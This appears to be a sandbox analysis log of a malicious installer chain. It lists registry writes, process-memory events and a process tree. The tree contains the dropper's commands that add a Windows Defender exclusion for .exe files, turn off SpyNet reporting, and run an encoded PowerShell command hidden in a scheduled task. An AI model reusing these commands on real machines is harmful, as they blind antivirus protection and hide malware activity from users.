Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{48d314f9-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\gDVVBwl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 448 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1284 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1612 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2356 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 412 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 2968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 3660 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2356 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 412 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4284 wrote to memory of 5064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 4284 wrote to memory of 5064 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\kkkbwzR.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2936 wrote to memory of 5116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5116 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4912 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2936 wrote to memory of 4240 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS9F5D.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSA160.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gTkUNKGdo" /SC once /ST 00:40:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gTkUNKGdo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gTkUNKGdo"

C:\Windows\SysWOW64\schtasks.exe

